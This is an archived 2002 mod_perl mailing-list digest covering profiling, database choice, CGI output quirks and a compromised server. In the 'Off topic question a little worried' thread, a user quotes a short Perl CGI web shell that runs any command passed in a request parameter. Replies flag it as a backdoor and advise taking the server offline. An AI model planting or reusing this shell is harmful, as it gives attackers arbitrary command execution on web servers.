Re: Off topic question a little worried

[Stas Bekman]

Chris Reinhardt wrote:
 On Thu, 21 Mar 2002, John Michael wrote:
 
 
#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param(g);
my $a=param(s);
if ($a || $k) {
$l=`$k 21`;
print start_form,textarea(g,$k,1,50);
print submit(sc);
print end_form;
print pre($l);
}
print $ENV{SERVER_NAME};

 
 It executes arbitrary commands as whatever your httpds run as.

don't delete it, but add the -T flag

#!/usr/bin/perl -T

In addition for the hacker not being able to run anything and probably 
not understanding why, you will be able to check the logs to see what IP 
the script was called from and hopefully trace down the bugger.


_
Stas Bekman JAm_pH  --   Just Another mod_perl Hacker
http://stason.org/  mod_perl Guide   http://perl.apache.org/guide
mailto:[EMAIL PROTECTED]  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/

Re: Subroutines taking time to return..

[David Brown]

Great feedback, many thanks.  But as always, one problem becomes another !

I've compiled + installed Apache-DB
I've compiled + installed DProf-19990108

I've added this to my httpd.conf:

PerlModule Apache::DProf

I've added this to my modperl.conf (called by httpd.conf):

use Apache::DProf;
use Apache::DB;
Apache::DB-init;

When Apache startsup I get:

[notice] Apache::DB initialized in child 55178

All good and well I thought.. But erm.. nothing is being created in the
dprof directory in the server-root.

What am I doing wrong ?

Regards

Re: Non-web use for Apache/mod_perl

[Stas Bekman]

Bas A.Schulte wrote:
 Hi,
 
 I've been meaning to write an article about how I used Apache/mod_perl 
 to implement a mobile SMS application platform as it demonstrates use of 
 Apache/mod_perl outside the Web realm, something I hadn't seen so far. 
 Time constraints (as always) have prevented me from doing this properly, 
 however, I'll try to give a short description of the system.
 
 The goal kinda is to see if others are using Apache/mod_perl in a 
 similar way to share experiences, discuss issues that arise or discuss 
 alternatives (I'd love someone to tell me I'm an idiot for handling all 
 this lowlevel stuff myself and move to J2EE/java at once, if he can 
 convince me I could have implemented this with the same budget and time 
 frame).

Very nice, Bas. Thanks for sharing with us.

For J2EE in Perl see http://p5ee.perl.org/. Very early alpha though.

For protocol server httpd-2.0/modperl-2.0 is exactly what you want, 
since it supports protocol servers and other useful things you will most 
likely benefit from (e.g. filtering), but don't hold your breath yet, 
since httpd-2.0 is not out yet. Though if you plan doing a next 
generation some time in the future, you probably better off start 
looking at modperl-2.0. We already have Eliza protocol example running 
as one of the tests:

t/TEST  -v protocol/eliza
protocol/eliza1..6
ok 1
# send: Hello Eliza
# recv: Hi. What seems to be your problem?
ok 2
# send: How are you
# recv: You're not really talking about me -- are you?
ok 3
# send: Why do I have core dumped?
# recv: That's quite interesting.
ok 4
# send: I feel like writing some tests today, you?
# recv: That is interesting. Please continue.
ok 5
# send: good bye
# recv: That is interesting. Please continue.
ok 6
ok
All tests successful.

This is the client:
http://cvs.apache.org/viewcvs.cgi/~checkout~/modperl-2.0/t/protocol/eliza.t
This is the server:
http://cvs.apache.org/viewcvs.cgi/~checkout~/modperl-2.0/t/protocol/TestProtocol/eliza.pm

Also, can we adapt your story for our success stories collection?
http://perl.apache.org/stories/
If so, can you please send me an adapted version, or I can simply throw 
it in as is :)




_
Stas Bekman JAm_pH  --   Just Another mod_perl Hacker
http://stason.org/  mod_perl Guide   http://perl.apache.org/guide
mailto:[EMAIL PROTECTED]  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/

Re: Non-web use for Apache/mod_perl

[Issac Goldstand]

Bas A.Schulte wrote:

 Hi,

 I've been meaning to write an article about how I used Apache/mod_perl 
 to implement a mobile SMS application platform as it demonstrates use 
 of Apache/mod_perl outside the Web realm, something I hadn't seen so 
 far. Time constraints (as always) have prevented me from doing this 
 properly, however, I'll try to give a short description of the system.

 The goal kinda is to see if others are using Apache/mod_perl in a 
 similar way to share experiences, discuss issues that arise or discuss 
 alternatives (I'd love someone to tell me I'm an idiot for handling 
 all this lowlevel stuff myself and move to J2EE/java at once, if he 
 can convince me I could have implemented this with the same budget and 
 time frame).

[snip]

I actually implemented a similar system, although it's not SMS specific. 
 Basically, I have a central system in Apache/mod_perl.  The eventual 
design is for full I/O in many protocols, including HTTP, SMTP, FTP and 
a handful of other protocols.  So far the output is pretty much ready, 
and I think I'm going to wait for Apache 2 before I do the inputs.  I 
_could_ write mod_perl handlers to understand other protocols, but 
Apache 2 is being designed around this, as far as I understand, so I'm 
going to do that around Apache 2 (as soon as I get off my ass and learn 
the new API :-))

  Issac

Re: Subroutines taking time to return..

[Stas Bekman]

David Brown wrote:
 Great feedback, many thanks.  But as always, one problem becomes another !
 
 I've compiled + installed Apache-DB
 I've compiled + installed DProf-19990108
 
 I've added this to my httpd.conf:
 
 PerlModule Apache::DProf
 
 I've added this to my modperl.conf (called by httpd.conf):
 
 use Apache::DProf;
 use Apache::DB;
 Apache::DB-init;
 
 When Apache startsup I get:
 
 [notice] Apache::DB initialized in child 55178
 
 All good and well I thought.. But erm.. nothing is being created in the
 dprof directory in the server-root.
 
 What am I doing wrong ?

You aren't doing it wrong. Next step is to run the script and usually it 
helps to read the docs :)

http://thingy.kcilink.com/modperlguide/performance/Code_Profiling_Techniques.html


_
Stas Bekman JAm_pH  --   Just Another mod_perl Hacker
http://stason.org/  mod_perl Guide   http://perl.apache.org/guide
mailto:[EMAIL PROTECTED]  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/

Re: Non-web use for Apache/mod_perl

[Bas A. Schulte]

Issac,

On Thursday, March 21, 2002, at 11:01 AM, Issac Goldstand wrote:

 Bas A.Schulte wrote:

 Hi,

 I've been meaning to write an article about how I used Apache/mod_perl 
 to implement a mobile SMS application platform as it demonstrates use 
 of Apache/mod_perl outside the Web realm, something I hadn't seen so 
 far. Time constraints (as always) have prevented me from doing this 
 properly, however, I'll try to give a short description of the system.

 The goal kinda is to see if others are using Apache/mod_perl in a 
 similar way to share experiences, discuss issues that arise or discuss 
 alternatives (I'd love someone to tell me I'm an idiot for handling 
 all this lowlevel stuff myself and move to J2EE/java at once, if he 
 can convince me I could have implemented this with the same budget and 
 time frame).

 [snip]

 I actually implemented a similar system, although it's not SMS 
 specific. Basically, I have a central system in Apache/mod_perl.  The 
 eventual design is for full I/O in many protocols, including HTTP, 
 SMTP, FTP and a handful of other protocols.

Well, this proves again that everything we software developers do has 
been done umteen times before ;)

The system I described actually isn't tied to SMS as well; it has been 
designed with other devices in mind as well. The virtual SMSC component 
as I described it really should have a better name as it really is a 
protocal handler and serializing/deserializing component that is capable 
of handling other protocol and formats. In fact, I am considering 
enhancing it to be able to use it in a WAP or i-Mode context (if we can 
only find a way to get paid by the mobile subscriber using WAP which is 
easy with SMS).


 So far the output is pretty much ready, and I think I'm going to wait 
 for Apache 2 before I do the inputs.  I _could_ write mod_perl handlers 
 to understand other protocols, but Apache 2 is being designed around 
 this, as far as I understand, so I'm going to do that around Apache 2 
 (as soon as I get off my ass and learn the new API :-))

Yep; Apache 2 combined with mod_perl sure sounds interesting, now if it 
only had the stability that 1.x has ;)

Regards,

Bas.

Re: Non-web use for Apache/mod_perl

[Ilya Martynov]

 On Thu, 21 Mar 2002 00:40:24 +0100, Bas A.Schulte [EMAIL PROTECTED] said:

BAS To handle a large number of concurrent transactions in a
BAS transaction-safe environment without me having to worry too much about
BAS concurrency issues and referential integrity I will slowly move to
BAS Oracle. $dbh-do('LOCK TABLE USER, INSTANCE, APP_DATA') just plain
BAS sucks unless you want to create a very large distributed *single-user*
BAS system running on multiple machines.

Without changing SQL backend you can have transactions with
MySQL. Just use InnoDB table type. It is faster than default table
type for read/write intensive applications because it doesn't lock
whole tables but provides Oracle style row-level locking.

-- 
oIlya Martynov = http://martynov.org/o
oTIV.net   = http://tiv.net/ o

Re: Subroutines taking time to return..

[David Brown]

Thankyou, but I have read the documentation.

Nothing gets written to a rootdir/dprof directory, not even an empty file
when the scripts are run.

 You aren't doing it wrong. Next step is to run the script and usually it
 helps to read the docs :)

Re: Non-web use for Apache/mod_perl

[Bas A. Schulte]

Hi,

On Thursday, March 21, 2002, at 11:39 AM, Ilya Martynov wrote:

 On Thu, 21 Mar 2002 00:40:24 +0100, Bas A.Schulte 
 [EMAIL PROTECTED] said:

 BAS To handle a large number of concurrent transactions in a
 BAS transaction-safe environment without me having to worry too much 
 about
 BAS concurrency issues and referential integrity I will slowly move to
 BAS Oracle. $dbh-do('LOCK TABLE USER, INSTANCE, APP_DATA') just plain
 BAS sucks unless you want to create a very large distributed 
 *single-user*
 BAS system running on multiple machines.

 Without changing SQL backend you can have transactions with
 MySQL. Just use InnoDB table type. It is faster than default table
 type for read/write intensive applications because it doesn't lock
 whole tables but provides Oracle style row-level locking.

I knew I shouldn't have mentioned MySQL and it's, possibly perceived, 
shortcomings ;)

I know about InnoDB, I know about Postgresql too, it's just that I 
really like Oracle for lots of reasons. I have no personal experience 
with running MySQL or Postgresql in a high-volume concurrent read/write 
transaction situation. It seems most MySQL success stories are about 
websites with 98% read-only transactions on the database which just 
isn't similar to my needs. I used MySQL myself for that type of problem 
and it sure worked.

If someone really wants to do another DB discussion, let's move that to 
a different discussion ;)

Bas.

[OT] Return Receipts

[Ewen Marshall]

I apologise striaght away for the completly off topic mail, but I'm desparate!

I am having problems with return receipts from our users here at work. When someone
requests a return receipt and I click okay, I get a Mailer-Daemon with the error:

 MAIL From:fransmaas.co.uk SIZE=2583
 501 fransmaas.co.uk: domain missing or malformed

For some reason it appears that the return receipt is not picking my email address as
being the From: address and the mail server (Sun box, Solaris 2.6) is substituting 
the From: with From:fransmaas.co.uk When I have a look at the sendmail 
config 
(sendmail.cf) I can find:

# handle from: special case  
R$*$* $ turn into magic token

Has this got anything to do with the problem? Please be aware that my sendmail 
knowledge
is very poor :(

Thanks in advance for any help.

Ewen

Re: Subroutines taking time to return..

[Stas Bekman]

David Brown wrote:
 Thankyou, but I have read the documentation.
 
 Nothing gets written to a rootdir/dprof directory, not even an empty file
 when the scripts are run.

sorry, you should have told this :0)

Could be write permissions?

Can you profile a normal perl script?

You aren't doing it wrong. Next step is to run the script and usually it
helps to read the docs :)
 
 
 
 
 



-- 


_
Stas Bekman JAm_pH  --   Just Another mod_perl Hacker
http://stason.org/  mod_perl Guide   http://perl.apache.org/guide
mailto:[EMAIL PROTECTED]  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/

Re: [OT] Return Receipts

[Rafiq Ismail (ADMIN)]

A quick fix might be to stick your from header in your script, when
generating the email.

fiq




On Thu, 21 Mar 2002, Ewen Marshall wrote:

 I apologise striaght away for the completly off topic mail, but I'm desparate!

 I am having problems with return receipts from our users here at work. When someone
 requests a return receipt and I click okay, I get a Mailer-Daemon with the error:

  MAIL From:fransmaas.co.uk SIZE=2583
  501 fransmaas.co.uk: domain missing or malformed

 For some reason it appears that the return receipt is not picking my email address as
 being the From: address and the mail server (Sun box, Solaris 2.6) is substituting
 the From: with From:fransmaas.co.uk When I have a look at the sendmail 
config
 (sendmail.cf) I can find:

 # handle from: special case
 R$*$* $ turn into magic token

 Has this got anything to do with the problem? Please be aware that my sendmail 
knowledge
 is very poor :(

 Thanks in advance for any help.

 Ewen

0 being appended to non mod_perl scripts.

[Mike Wille]

Hello all,

I apologize if this has already been answered elsewhere, I haven't been able
to find it.

I am encountering a wierd problem where perl scripts running under a normal
cgi-bin (ie no mod_perl) have a '0' appended to the output.  This does not
happen to scripts run under mod_perl.  It also only happens when
PerlSendHeader is set to on.  I thought that PerlSendHeader was a mod_perl
only directive, but just to check I added PerlSendHeader off to the cgi-bin
directory.  That had no effect.

Has anyone else encountered this and how did you fix it?

Thanks in advanced,
Mike Wille

Re: 0 being appended to non mod_perl scripts.

[Stas Bekman]

[reminder: keep replies CC'ed to the list! Thanks]

Mike Wille wrote:
 Thanks for the suggestion, but I mentioned earlier that mod_perl is not
 running these scripts appended with a 0.  Everything in cgi-bin which
 includes everything with a 0 appended is being run under mod_cgi.

As I suggested remove all the configurations you have added, and just 
add a simply ScriptAlias and test. still having a problem? than it has 
nothing to do with mod_perl.
Most likely you include some module that prints 0 in the END/DESTROY 
block or something like this.

You didn't answer whether you have the same problem with the script I've 
suggested for you to run. If 0 doesn't appear with this 3 liner, see the 
item above, if the item above doesn't help see the 2nd item above.

e.g. I don't see where is your ScriptAlias setting. You cannot run
mod_cgi without setting ScriptAlias or using
 
 
 I'm sorry, I forgot to throw in the ScriptAlias with the config block I
 emailed earlier.  I do indeed have a ScriptAlias set to:
 
 ScriptAlias /cgi-bin/ /home/www/cgi-bin/

cool


_
Stas Bekman JAm_pH  --   Just Another mod_perl Hacker
http://stason.org/  mod_perl Guide   http://perl.apache.org/guide
mailto:[EMAIL PROTECTED]  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/

modperl and SQL db select

[dreamwvr]

hi,
  
  Is there any issue with using modperl with postgres vs mysql 
for a database driven website? Don't want to bark up the wrong 
tree in a mod_perl project only to discover I picked the wrong .db :-/ 

From a licensing perspective which one is less risky if doing some 
work for a client? Noticed slashcode however the postgres port 
has stopped. AFAIK anyhow. Thought if practical I would do 
some coding to integrate Postgres if it is the right choice.
If not MySQL? Just wanted to confirm that either is safe for a 
customer to use. They would not sell the program but they might
sell the programs I write and the actual singular database.

   Basically I want to simply insert data into a 
.db and then  produce HTML from the results and queries.
The thought has crossed my mind to as well output the images
as well from the .db What mod:perl modules should I seriously
consider. Appreciate any pointers here as am just about to 
to begin the DBI:: stuff.

TIA
[EMAIL PROTECTED]

 

Re: modperl and SQL db select

[darren chamberlain]

Quoting dreamwvr [EMAIL PROTECTED] [Mar 21, 2002 13:10]:
 Is there any issue with using modperl with postgres vs mysql
 for a database driven website? Don't want to bark up the wrong
 tree in a mod_perl project only to discover I picked the wrong
 .db :-/ 

Take a look at URL:http://www.phpbuilder.com/columns/tim2705.php3,
in which the author discusses why Sourceforge uses postgresql
instead of MySQL.  It's a little dated (the postgres version is
7.1, for example) but a fun read.

(darren)

-- 
We must respect the other fellow's religion, but only in the sense and
to the extent that we respect his theory that his wife is beautiful
and his children smart.
-- H.L.Mencken

Re: modperl and SQL db select

[Dave Hodgkinson]

darren chamberlain [EMAIL PROTECTED] writes:

 Quoting dreamwvr [EMAIL PROTECTED] [Mar 21, 2002 13:10]:
  Is there any issue with using modperl with postgres vs mysql
  for a database driven website? Don't want to bark up the wrong
  tree in a mod_perl project only to discover I picked the wrong
  .db :-/ 
 
 Take a look at URL:http://www.phpbuilder.com/columns/tim2705.php3,
 in which the author discusses why Sourceforge uses postgresql
 instead of MySQL.  It's a little dated (the postgres version is
 7.1, for example) but a fun read.

It's also been thoroughly rebutted ISTR :-)

-- 
David Hodgkinson, Wizard for Hirehttp://www.davehodgkinson.com
Editor-in-chief, The Highway Star   http://www.deep-purple.com
All the Purple Family Tree news   http://www.slashrock.com
   Interim Technical Director, Web Architecture Consultant for hire

Re: modperl and SQL db select

[darren chamberlain]

Quoting Dave Hodgkinson [EMAIL PROTECTED] [Mar 21, 2002 13:25]:
 darren chamberlain [EMAIL PROTECTED] writes:
  Quoting dreamwvr [EMAIL PROTECTED] [Mar 21, 2002 13:10]:
   Is there any issue with using modperl with postgres vs mysql
   for a database driven website? Don't want to bark up the wrong
   tree in a mod_perl project only to discover I picked the wrong
   .db :-/ 
  
  Take a look at URL:http://www.phpbuilder.com/columns/tim2705.php3,
  in which the author discusses why Sourceforge uses postgresql
  instead of MySQL.  It's a little dated (the postgres version is
  7.1, for example) but a fun read.
 
 It's also been thoroughly rebutted ISTR :-)

I didn't say it was _accurate_, I said it was _fun_. :)

(darren)

-- 
There are two ways of constructing a software design. One way is
to make it so simple that there are obviously no deficiencies. And
the other way is to make it so complicated that there are no
obvious deficiencies.
-- C.A.R. Hoare

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Michael Alan Dorman]

Perrin Harkins [EMAIL PROTECTED] writes:
 This sort of begs the question: why not use DB 3.x?  Is there some new
 feature you need in DB 4?

Anecdotaly, I believe the OpenLDAP and Cyrus projects have both found
DB4 to be more reliable under load than DB3.

Mike.

Re: Subroutines taking time to return..

[Perrin Harkins]

David Brown wrote:
 All good and well I thought.. But erm.. nothing is being created in the
 dprof directory in the server-root.

When you call the script, do you get segfaults in the error log?

Make sure that you do the DProf stuff, including Apache::DB-init(), 
before you load any of your other modules.  Otherwise, the debugging 
symbols don't get put into your code.

- Perrin

Re: modperl and SQL db select

[Jay Thorne]

On March 21, 2002 10:37 am, darren chamberlain wrote:
 Quoting Dave Hodgkinson [EMAIL PROTECTED] [Mar 21, 2002 13:25]:
  darren chamberlain [EMAIL PROTECTED] writes:
   Quoting dreamwvr [EMAIL PROTECTED] [Mar 21, 2002 13:10]:
Is there any issue with using modperl with postgres vs mysql
for a database driven website? Don't want to bark up the wrong
tree in a mod_perl project only to discover I picked the wrong
.db :-/
  
   Take a look at
   URL:http://www.phpbuilder.com/columns/tim2705.php3, in which the
   author discusses why Sourceforge uses postgresql
   instead of MySQL.  It's a little dated (the postgres version is
   7.1, for example) but a fun read.

Note that a couple of his assertions in this document would be rather naive.

The first one I noted was that he assumes that a high performance app has 
several joins. I think everyone here who's developed a few db apps will tell 
you that joins are hugely costly and should be avoided for an application's 
most common cases. 

I recoded a mysql/mod_perl web app with a couple of joins to a slightly but 
not horridly denormalized db structure and realized some huge performance 
gains. 

Further on, he was discussing threaded discussion forums and assumed a 
recursive query. While recursing the DATA is probably (though provabably not 
always) necessary, there is no need to storm the db with that many queries, 
since query setup time, queing, and results extraction have noticable time 
penalties. Extracting the data with a single query and recursing it in RAM is 
a much more db and cpu friendly idea. 

So is time dependent caching. How many inserts into a table per second do you 
expect? For your average discussion thing, maybe one new comment per minute. 
With a one minute cache on the db data, suddenly your speed limits are 
removed. Why would you need to requery the db if you don't expect it to 
change? This is the joy of mod_perl, being able to keep some context of your 
_application_ between hits of your _users_.


As for performance, mysql and postgresql are getting pretty similar results, 
_these_ days. With aggressive app level caching of db data, and the innodb 
table handler, I was able to push mysql and mod_perl to 80+ 50kbyte page 
views per second on bog standard 650 mhz intel hardware. 

-- 
Jay yohimbe Thorne  [EMAIL PROTECTED]
Mgr Sys  Tech, Userfriendly.org

Re: Subroutines taking time to return..

[David Brown]

OK, I have it working now.

I had to manually create the dprof directory in APACHEROOT/logs (I had
expected it to be created), and then set the permissions such that apache
(running as user: nobody) could write to it.

Sorted.

Thanks for your guidance guys.

- Original Message -
From: Perrin Harkins [EMAIL PROTECTED]
To: David Brown [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Sent: Thursday, March 21, 2002 7:07 PM
Subject: Re: Subroutines taking time to return..


 David Brown wrote:
  All good and well I thought.. But erm.. nothing is being created in the
  dprof directory in the server-root.

 When you call the script, do you get segfaults in the error log?

 Make sure that you do the DProf stuff, including Apache::DB-init(),
 before you load any of your other modules.  Otherwise, the debugging
 symbols don't get put into your code.

Re: modperl and SQL db select

[Rafiq Ismail (ADMIN)]

Postgres: +More relational?  So they say.  More features perhaps.
  +stored procedures - ie. you can make query wrapping methods
  -pain the rear postgres user permissions to control.
  +been doing complex sql queries (subselects etc,)
   for longer.
  +Reminds me a lot of what I used to be able to do
   with oracle.
  +probably faster to set up ( than oracle ;) ).
  +every element of the database has a unique oid field which
   internally makes everything uniquely accessible by
   this field.
  +has all or nothing transaction support to avoid partially
   corrupting your data - it either completes the query(or group
   of queries)  or it does'nt - useful when it's under heavy load or
   joe blogs comes along writes cr@p code and dependent writes updates
   to the live db, since he enjoys making changes to live, he
   doesn't know much sql and and he mispells update in the
   second query. Ooops.  He's got a partially altered database
   and who knows what insanity this might cause for us.  Or even
   manager blogs using odbc and doing the same there with his 'i'm
   a techie deep down' script.  That was long!
  +Better under heavy load.
  +Clean shutdowns under heavy load.
  +psql has a cr@p command line.
  +better optimizer

Mysql:+we all start with it.
  +Bench marks much faster.
  +/-Can allow nested queries (subselects again) though this is a
   relatively new feature.
  +People say it's less relational.  Isn't really - but has fewer
   features (see above)
  +Doesn't have stored procedure support.
  +Think that I've read that it's indexing mechanism is not as
   good as postgres'.
  +probably easier to grasp if you haven't used it before
  +negate all of the above postgres points.
  -less reliable under heavy load.

Images: Image::Magick - probably don't want the pictures themselves in the
database, so much as pointers to their physical location and a means of
pushing them in and out - use this for getting stats on them and
manipulating thumbnails etc.

My .02 EU
Probably get flamed for being all wrong.  But I'm not.
So there!! :)

Happy First Day of Spring,
fiq







On Thu, 21 Mar 2002, dreamwvr wrote:

 hi,

   Is there any issue with using modperl with postgres vs mysql
 for a database driven website? Don't want to bark up the wrong
 tree in a mod_perl project only to discover I picked the wrong .db :-/

 From a licensing perspective which one is less risky if doing some
 work for a client? Noticed slashcode however the postgres port
 has stopped. AFAIK anyhow. Thought if practical I would do
 some coding to integrate Postgres if it is the right choice.
 If not MySQL? Just wanted to confirm that either is safe for a
 customer to use. They would not sell the program but they might
 sell the programs I write and the actual singular database.

Basically I want to simply insert data into a
 .db and then  produce HTML from the results and queries.
 The thought has crossed my mind to as well output the images
 as well from the .db What mod:perl modules should I seriously
 consider. Appreciate any pointers here as am just about to
 to begin the DBI:: stuff.

 TIA
 [EMAIL PROTECTED]

Re: Off topic question a little worried

[John Michael]

Any idea as to how it got on my server.  It is owned by apache and in the
apache group.  That tells me that it was put on there by apache.  It is in a
directory that has the permissions 777 because the script that is normally
in there keeps and writes traffic information, so I guess someone found a
way to have apache write the file into that directory.  But how did they get
it to chmod 755?
John michael




 On Thu, 21 Mar 2002, John Michael wrote:

  #!/usr/bin/perl
  use CGI qw(:standard);
  print header;
  my $k=param(g);
  my $a=param(s);
  if ($a || $k) {
  $l=`$k 21`;
  print start_form,textarea(g,$k,1,50);
  print submit(sc);
  print end_form;
  print pre($l);
  }
  print $ENV{SERVER_NAME};

 It executes arbitrary commands as whatever your httpds run as.


 --
 Chris Reinhardt
 [EMAIL PROTECTED]
 Systems Architect
 Dynamic DNS Network Services
 http://www.dyndns.org/

RE: 0 being appended to non mod_perl scripts.

[Mike Wille]

There are a few scripts that use system calls (``).  There are scripts that
don't use system calls at all and still have the 0.  None of them create any
subprocesses.

I checked to see if mod_perl was handling the scripts that sent the '0' but
perl is indeed handling them and not httpd.

For testing this problem I have a standard setup:

Directory /home/www/cgi-bin
   AllowOverride None
   Options None
   Order allow,deny
   Allow from all
   Options +ExecCGI
/Directory

The mod_perl script directory:

Directory /home/www/perl
   SetHandler perl-script
   PerlHandler Apache::Registry
   Options +ExecCGI
   PerlSendHeader on
   PerlModule Apache::DBI Apache::StatINC
   AllowOverride All
/Directory

The server is running Apache 1.3.20.  I'm not sure how to find the version
of mod_perl...

Nothing looks out of wack does it?  Anything running in cgi-bin has a '0'
appended to it and is exceuted by perl.  Anything in perl does not have the
'0' and is executed by httpd.

- Mike

-Original Message-
From: darren chamberlain [mailto:[EMAIL PROTECTED]]
Sent: Thursday, March 21, 2002 11:49 AM
To: [EMAIL PROTECTED]
Subject: Re: 0 being appended to non mod_perl scripts.


Quoting Mike Wille [EMAIL PROTECTED] [Mar 21, 2002 11:36]:
 I apologize if this has already been answered elsewhere, I
 haven't been able to find it.

 I am encountering a wierd problem where perl scripts running
 under a normal cgi-bin (ie no mod_perl) have a '0' appended to
 the output.  This does not happen to scripts run under
 mod_perl.  It also only happens when PerlSendHeader is set to
 on.  I thought that PerlSendHeader was a mod_perl only
 directive, but just to check I added PerlSendHeader off to the
 cgi-bin directory.  That had no effect.

 Has anyone else encountered this and how did you fix it?

This looks like an exit code to me.  Does the script create
subprocesses or use system?  Also, if PerlSendHeader is making
the script behave differently, it sounds like mod_perl is
handling your script (you can check for $ENV{MOD_PERL}).

(darren)

--
People who are willing to give up freedom for the sake of short
term security, deserve neither freedom nor security.
-- Ben Franklin

RE: 0 being appended to non mod_perl scripts.

[Ged Haywood]

Hi there,

On Thu, 21 Mar 2002, Mike Wille wrote:

[snip,snip]
 I checked to see if mod_perl was handling the scripts that sent the '0' but
 perl is indeed handling them and not httpd.

I'm not sure I understand what you're saying here.

 The server is running Apache 1.3.20.  I'm not sure how to find the version
 of mod_perl...

Does this mean you'vve *never* looked in the error_log???

73,
Ged.

Re: Off topic question a little worried

[Perrin Harkins]

John Michael wrote:
 Any idea as to how it got on my server.

Someone found a serious security hole in something you're running.  You 
have to assume that your server has been completely compromised and that 
the entire world now has root access to it through a hundred backdoors 
they installed.  Take it off-line now, before you find out it sent 
millions of porn spam messages.  You can study it later to try and find 
the problem.

- Perrin

Re: 0 being appended to non mod_perl scripts.

[Stas Bekman]

Mike Wille wrote:
 There are a few scripts that use system calls (``).  There are scripts that
 don't use system calls at all and still have the 0.  None of them create any
 subprocesses.
 
 I checked to see if mod_perl was handling the scripts that sent the '0' but
 perl is indeed handling them and not httpd.

As Darren has suggested please try this script:

#!/usr/bin/perl -wT

print Content-type: text/plain\n\n;
print Running under ;
print $ENV{MOD_PERL} ? mod_perl : mod_cgi;

and if you get mod_perl, and you don't know to figure out why, start 
from scratch, remove all configs you have added to the default 
httpd.conf and then start adding one by one and see what you are doing 
wrong.

e.g. I don't see where is your ScriptAlias setting. You cannot run 
mod_cgi without setting ScriptAlias or using

SetHandler default-handler

for example see:
http://perl.apache.org/guide/config.html#Overriding_Location_Setting_in
and the rest of the chapter

 For testing this problem I have a standard setup:
 
 Directory /home/www/cgi-bin
AllowOverride None
Options None
Order allow,deny
Allow from all
Options +ExecCGI
 /Directory
 
 The mod_perl script directory:
 
 Directory /home/www/perl
SetHandler perl-script
PerlHandler Apache::Registry
Options +ExecCGI
PerlSendHeader on
PerlModule Apache::DBI Apache::StatINC
AllowOverride All
 /Directory
 
 The server is running Apache 1.3.20.  I'm not sure how to find the version
 of mod_perl...
 
 Nothing looks out of wack does it?  Anything running in cgi-bin has a '0'
 appended to it and is exceuted by perl.  Anything in perl does not have the
 '0' and is executed by httpd.
 
 - Mike
 
 -Original Message-
 From: darren chamberlain [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, March 21, 2002 11:49 AM
 To: [EMAIL PROTECTED]
 Subject: Re: 0 being appended to non mod_perl scripts.
 
 
 Quoting Mike Wille [EMAIL PROTECTED] [Mar 21, 2002 11:36]:
 
I apologize if this has already been answered elsewhere, I
haven't been able to find it.

I am encountering a wierd problem where perl scripts running
under a normal cgi-bin (ie no mod_perl) have a '0' appended to
the output.  This does not happen to scripts run under
mod_perl.  It also only happens when PerlSendHeader is set to
on.  I thought that PerlSendHeader was a mod_perl only
directive, but just to check I added PerlSendHeader off to the
cgi-bin directory.  That had no effect.

Has anyone else encountered this and how did you fix it?
 
 
 This looks like an exit code to me.  Does the script create
 subprocesses or use system?  Also, if PerlSendHeader is making
 the script behave differently, it sounds like mod_perl is
 handling your script (you can check for $ENV{MOD_PERL}).
 
 (darren)
 
 --
 People who are willing to give up freedom for the sake of short
 term security, deserve neither freedom nor security.
 -- Ben Franklin



-- 


_
Stas Bekman JAm_pH  --   Just Another mod_perl Hacker
http://stason.org/  mod_perl Guide   http://perl.apache.org/guide
mailto:[EMAIL PROTECTED]  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/

Re: [OT] Off topic question a little worried

[wsheldah]

This link offers some general guidelines for recovering from a compromised
server:
http://www.cert.org/tech_tips/win-UNIX-system_compromise.html

Hope it helps, and good luck.

Wes




Perrin Harkins [EMAIL PROTECTED] on 03/21/2002 03:42:55 PM

To:   John Michael [EMAIL PROTECTED]
cc:   [EMAIL PROTECTED] (bcc: Wesley
  Sheldahl/Lex/Lexmark)
Subject:  Re: Off topic question  a little worried


John Michael wrote:
 Any idea as to how it got on my server.

Someone found a serious security hole in something you're running.  You
have to assume that your server has been completely compromised and that
the entire world now has root access to it through a hundred backdoors
they installed.  Take it off-line now, before you find out it sent
millions of porn spam messages.  You can study it later to try and find
the problem.

- Perrin

Re: modperl and SQL db select

[Dave Rolsky]

On Thu, 21 Mar 2002, Jay Thorne wrote:

 The first one I noted was that he assumes that a high performance app has
 several joins. I think everyone here who's developed a few db apps will tell
 you that joins are hugely costly and should be avoided for an application's
 most common cases.

Actually, I've developed _more_ than a few DB apps and I'd tell you that
joins are not only _not_ hugely costly, but can sometimes be a performance
improvement.

It really depends on a lot of factors including what RDBMS you are using,
how many connections you have, ratio of reads to writes, how complicated
the joins are.

But a blanket statement like that is flat out wrong.

 I recoded a mysql/mod_perl web app with a couple of joins to a slightly but
 not horridly denormalized db structure and realized some huge performance
 gains.

You removed denormalization, thereby increasing the amount of work
necessary to maintain data integrity so the reads may be faster but the
writes are definitely slower and more prone to screwing things up.  Even
worse, you denormalized in favor of _one_ app, obviously, which means any
new app you write on top of this denormalized db in the future may suffer
because the denormalization doesn't serve it well.

 Further on, he was discussing threaded discussion forums and assumed a
 recursive query. While recursing the DATA is probably (though provabably not
 always) necessary, there is no need to storm the db with that many queries,
 since query setup time, queing, and results extraction have noticable time
 penalties. Extracting the data with a single query and recursing it in RAM is
 a much more db and cpu friendly idea.

This I can agree on, though it is more a limitation of SQL, which provides
no meaningful way to do a recursive query.

 As for performance, mysql and postgresql are getting pretty similar results,
 _these_ days. With aggressive app level caching of db data, and the innodb
 table handler, I was able to push mysql and mod_perl to 80+ 50kbyte page
 views per second on bog standard 650 mhz intel hardware.

Again, that will depend on a number of things including complexity of your
queries and ratio of reads vs. writes, etc.  It's worth noting that
MySQL's query optimizer pretty much stinks and will often not use indexes
because it simply gives up when queries have an 'OR' in them, for example.

What it comes down to is that except for _extremely_ demanding
applications, either one is likely to be perfectly suitable so pick the
one that you like best, or that has the features you need, or that your
sysadmins can support most easily, or whatever.


-dave

/*==
www.urth.org
we await the New Sun
==*/

Re: Subroutines taking time to return..

[Ged Haywood]

Hi there,

